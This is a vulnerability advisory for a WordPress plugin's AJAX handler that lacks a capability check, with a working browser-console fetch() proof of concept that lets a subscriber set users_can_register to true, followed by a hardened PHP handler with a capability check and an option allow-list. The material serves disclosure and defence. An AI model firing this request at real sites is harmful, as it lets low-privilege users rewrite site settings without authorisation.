Description

The plugin is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler, allowing any authenticated user, such as a subscriber, to update arbitrary site options.

Run the command below in the web browser's developer console while on the blog as a subscriber user to set the users_can_register option to true.
fetch("/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    "method": "POST",
    "body": 'action=wpgdprc_update_integration&data={"name":"users_can_register","value":true,"type":"yolo"}&security=' + wpgdprcAdmin['ajaxNonce'],
    "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
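
A sketch of a handler for the wpgdprc_update_integration action with the missing checks in place. This is an added example, not the plugin's own code or its actual patch; the function name, nonce action and allow-listed option names are hypothetical.

```php
<?php
// Added example: hardened AJAX handler. All example_* names are hypothetical.

// Assumption: the only options this endpoint is ever meant to write.
const EXAMPLE_ALLOWED_OPTIONS = array(
    'example_integration_enabled' => 'boolean',
    'example_integration_label'   => 'string',
);

add_action( 'wp_ajax_wpgdprc_update_integration', 'example_update_integration' );

function example_update_integration() {
    // CSRF protection only. The request above shows the nonce is readable by
    // a subscriber, so a valid nonce says nothing about privilege.
    check_ajax_referer( 'example_nonce_action', 'security' );

    // The capability check: only users who may manage site options proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    $raw  = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : '';
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) || ! isset( $data['name'], $data['value'] )
        || ! is_string( $data['name'] ) || ! is_scalar( $data['value'] ) ) {
        wp_send_json_error( array( 'message' => 'Malformed request' ), 400 );
    }

    // Never pass a client-supplied option name straight to update_option():
    // core options such as users_can_register must not be reachable here.
    $name = $data['name'];
    if ( ! array_key_exists( $name, EXAMPLE_ALLOWED_OPTIONS ) ) {
        wp_send_json_error( array( 'message' => 'Unknown option' ), 400 );
    }

    // Coerce the value to the type the allow-list declares for this option.
    if ( 'boolean' === EXAMPLE_ALLOWED_OPTIONS[ $name ] ) {
        $value = filter_var( $data['value'], FILTER_VALIDATE_BOOLEAN );
    } else {
        $value = sanitize_text_field( (string) $data['value'] );
    }

    update_option( $name, $value );
    wp_send_json_success( array( 'name' => $name ) );
}
```

With the capability check alone the subscriber request is rejected with a 403; the allow-list additionally keeps an administrator session from being used to write options the feature was never meant to touch.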